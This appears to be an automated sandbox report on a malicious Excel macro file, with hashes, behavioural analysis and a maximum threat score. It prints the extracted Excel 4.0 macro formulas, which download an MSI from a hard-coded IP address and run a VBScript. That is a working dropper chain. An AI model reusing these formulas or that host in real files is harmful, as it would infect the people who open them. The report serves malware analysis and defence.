General
-
Target
7099f5e1d75a28cec1775de66911831d
-
Size
6KB
-
Sample
231222-fzffgshcbq
-
MD5
7099f5e1d75a28cec1775de66911831d
-
SHA1
4b581d87b66d557b82322296d2722574a926aea3
-
SHA256
1be2d1034a302dc9b5bcea93429a2793c03c8d115145fafe9aadaac69ffa534a
-
SHA512
264d30558010c3243456ed1c25185fd60b929dd3096460039596427a24cff516dc2ed7bcd467a4c084baceb972ceae898d5a20c6a537ba0b2ca9a6aebe9a29c6
-
SSDEEP
192:NDSuuSYbrA2OmmfRf8UhHFBFYuRb98y5y+V:NFu1M2wB1FYAb98y5N
Static task
static1
Behavioral task
behavioral1
Sample
7099f5e1d75a28cec1775de66911831d.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7099f5e1d75a28cec1775de66911831d.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
7099f5e1d75a28cec1775de66911831d
-
Size
6KB
-
MD5
7099f5e1d75a28cec1775de66911831d
-
SHA1
4b581d87b66d557b82322296d2722574a926aea3
-
SHA256
1be2d1034a302dc9b5bcea93429a2793c03c8d115145fafe9aadaac69ffa534a
-
SHA512
264d30558010c3243456ed1c25185fd60b929dd3096460039596427a24cff516dc2ed7bcd467a4c084baceb972ceae898d5a20c6a537ba0b2ca9a6aebe9a29c6
-
SSDEEP
192:NDSuuSYbrA2OmmfRf8UhHFBFYuRb98y5y+V:NFu1M2wB1FYAb98y5N
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-